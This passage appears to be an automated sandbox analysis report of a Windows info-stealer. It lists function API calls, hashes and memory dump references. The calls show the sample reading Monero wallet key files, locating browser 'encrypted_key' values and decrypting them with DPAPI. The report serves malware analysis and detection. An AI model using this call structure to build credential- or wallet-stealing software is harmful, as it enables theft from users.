                  • Instruction ID: 41c775f97cebae6e877b9e45ad7f3619a1f6ecc49bcf51598e928fd8d7c2ca6c
                  • Opcode Fuzzy Hash: 8029aaafd2f99642a57ba77ea342f85c0e1b9b99fc8d055a9a2f809910a98ae8
                  • Instruction Fuzzy Hash: 6EE0E675A90308BBD710DF98DD09E5977B8EB45701F004195FD09D7350D9715E109F66
                  Function 00B0A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B18B60: GetSystemTime.KERNEL32(00B20E1A,011FA058,00B205AE,?,?,00B013F9,?,0000001A,00B20E1A,00000000,?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B18B86
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 00B0A3FF
                  • lstrlen.KERNEL32(00000000), ref: 00B0A6BC
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 00B0A743
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 8473239962e06cfc783101326b379a8bd1f83b4a18a34ad325b4eb839d3c735d
                  • Instruction ID: da3ca989440cd7e2813cb850c236dbfae46319bf67e9cd11637c7922253efa14
                  • Opcode Fuzzy Hash: 8473239962e06cfc783101326b379a8bd1f83b4a18a34ad325b4eb839d3c735d
                  • Instruction Fuzzy Hash: FFE1F5728111189BDB05FBA4DD91EEE737CAF14310F908599F516B6091EF307A8ACB72
                  Function 00B0D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B18B60: GetSystemTime.KERNEL32(00B20E1A,011FA058,00B205AE,?,?,00B013F9,?,0000001A,00B20E1A,00000000,?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B18B86
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0D481
                  • lstrlen.KERNEL32(00000000), ref: 00B0D698
                  • lstrlen.KERNEL32(00000000), ref: 00B0D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 00B0D72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 016bfe36e2432919d864114882b3d8bae19a552a05bbf8d7d58f51021fd5928b
                  • Instruction ID: 6fff990be55d8a818484e3cc15bf971cacaef2641e02a1bfeef4d56fa58c9582
                  • Opcode Fuzzy Hash: 016bfe36e2432919d864114882b3d8bae19a552a05bbf8d7d58f51021fd5928b
                  • Instruction Fuzzy Hash: 329111728111089BDB04FBA4DD96DEE73B8AF14310F9041A9F517B6191EF347A8ACB72
                  Function 00B0D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B18B60: GetSystemTime.KERNEL32(00B20E1A,011FA058,00B205AE,?,?,00B013F9,?,0000001A,00B20E1A,00000000,?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B18B86
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0D801
                  • lstrlen.KERNEL32(00000000), ref: 00B0D99F
                  • lstrlen.KERNEL32(00000000), ref: 00B0D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 00B0DA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 40ddbae08389eff940f04e709a8bf6125b589ea9107f121e6b77fac2a61ab910
                  • Instruction ID: fd8366b6cff4aef7bdc975bc7578b4ddbe50f94fda09f69c480fa21517a326e4
                  • Opcode Fuzzy Hash: 40ddbae08389eff940f04e709a8bf6125b589ea9107f121e6b77fac2a61ab910
                  • Instruction Fuzzy Hash: CB8121729111089BCB04FBA4DD96DEE73B8AF14310F8045A9F507B6191EF347A8ACB72
                  Function 00B13560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 953de6e220bfc5563d585ffb9acea5e75b123e5e7713d8f299b4fa18b8970984
                  • Instruction ID: 37de0902b0e5657caeafd7cd3f3ea11b8f51edb292bab8f3c0a94a613bea230d
                  • Opcode Fuzzy Hash: 953de6e220bfc5563d585ffb9acea5e75b123e5e7713d8f299b4fa18b8970984
                  • Instruction Fuzzy Hash: 994160B1D14209AFCB04EFA4D985AEEB7F8EF54704F448058E41677291EB34AA85CFA1
                  Function 00B09CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B099EC
                    • Part of subcall function 00B099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09A11
                    • Part of subcall function 00B099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B09A31
                    • Part of subcall function 00B099C0: ReadFile.KERNEL32(000000FF,?,00000000,00B0148F,00000000), ref: 00B09A5A
                    • Part of subcall function 00B099C0: LocalFree.KERNEL32(00B0148F), ref: 00B09A90
                    • Part of subcall function 00B099C0: CloseHandle.KERNEL32(000000FF), ref: 00B09A9A
                    • Part of subcall function 00B18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B18E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00B09D39
                    • Part of subcall function 00B09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B04EEE,00000000,00000000), ref: 00B09AEF
                    • Part of subcall function 00B09AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00B04EEE,00000000,?), ref: 00B09B01
                    • Part of subcall function 00B09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B04EEE,00000000,00000000), ref: 00B09B2A
                    • Part of subcall function 00B09AC0: LocalFree.KERNEL32(?,?,?,?,00B04EEE,00000000,?), ref: 00B09B3F
                    • Part of subcall function 00B09B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B09B84
                    • Part of subcall function 00B09B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00B09BA3
                    • Part of subcall function 00B09B60: LocalFree.KERNEL32(?), ref: 00B09BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: a34fd592556fef472d7b6376e22a15f375f190a705ec5e4fbf733287624aa1cc
                  • Instruction ID: 16494c9a04a0955a362664c1f3b04e282455210568eeb1ae12f965c5da97b242
                  • Opcode Fuzzy Hash: a34fd592556fef472d7b6376e22a15f375f190a705ec5e4fbf733287624aa1cc
                  • Instruction Fuzzy Hash: CB3132B5D10109ABCB14EFE4DC85AEE7BF8FB48304F5445A8E915A7282E7349A44CBA1
                  Function 00B192E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00B13AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00B13AEE,?), ref: 00B192FC
                  • GetFileSizeEx.KERNEL32(000000FF,00B13AEE), ref: 00B19319
                  • CloseHandle.KERNEL32(000000FF), ref: 00B19327
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: cd0c2ed6c17acf4030dde7b5c1b17c9009fc784ba604f05a93d0251848d6ed4e
                  • Instruction ID: 3cf48bd31808019bb281405bb2c4df4fb661d8d8ed8e631b7fb887ea2903469a
                  • Opcode Fuzzy Hash: cd0c2ed6c17acf4030dde7b5c1b17c9009fc784ba604f05a93d0251848d6ed4e
                  • Instruction Fuzzy Hash: 9FF03C39E80308BBDB20DFB4EC59B9E77F9EB48710F508294B661E72C0D6749A418B54
                  Function 00B1C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • __getptd.LIBCMT ref: 00B1C74E
                    • Part of subcall function 00B1BF9F: __amsg_exit.LIBCMT ref: 00B1BFAF
                  • __getptd.LIBCMT ref: 00B1C765
                  • __amsg_exit.LIBCMT ref: 00B1C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00B1C797
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 1ff1af37854c75a688c8fbf0f79fa042d9e07c599aa3812e9e74c8f7f8448743
                  • Instruction ID: 4466ab969bd3927a84038dafc8e79858040cea01ccf9ac7abc7f01005cfa8ccc
                  • Opcode Fuzzy Hash: 1ff1af37854c75a688c8fbf0f79fa042d9e07c599aa3812e9e74c8f7f8448743
                  • Instruction Fuzzy Hash: 50F030329857109BD721BBB85846FDD3BE0AF00721FA441C9F414A71D2DFA46DC29E5A
                  Function 00B14F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00B14F7A
                  • lstrcat.KERNEL32(?,00B21070), ref: 00B14F97
                  • lstrcat.KERNEL32(?,011F8A50), ref: 00B14FAB
                  • lstrcat.KERNEL32(?,00B21074), ref: 00B14FBD
                    • Part of subcall function 00B14910: wsprintfA.USER32 ref: 00B1492C
                    • Part of subcall function 00B14910: FindFirstFileA.KERNEL32(?,?), ref: 00B14943
                    • Part of subcall function 00B14910: StrCmpCA.SHLWAPI(?,00B20FDC), ref: 00B14971
                    • Part of subcall function 00B14910: StrCmpCA.SHLWAPI(?,00B20FE0), ref: 00B14987
                    • Part of subcall function 00B14910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B14B7D
                    • Part of subcall function 00B14910: FindClose.KERNEL32(000000FF), ref: 00B14B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: 8a58ee84ba825f21e485e0a290aa8ac49d0b56a6d5c1dc5b6fc4501c590d31d6
                  • Instruction ID: 3e2168070eaed4a18daea89e95257e9e2982db85262c4ff34dadb9c0f223dd59
                  • Opcode Fuzzy Hash: 8a58ee84ba825f21e485e0a290aa8ac49d0b56a6d5c1dc5b6fc4501c590d31d6
                  • Instruction Fuzzy Hash: D121FB7A94030467C754FFB4EC46EED33BCAB55300F4045D4B649D6191EE7496C98BB2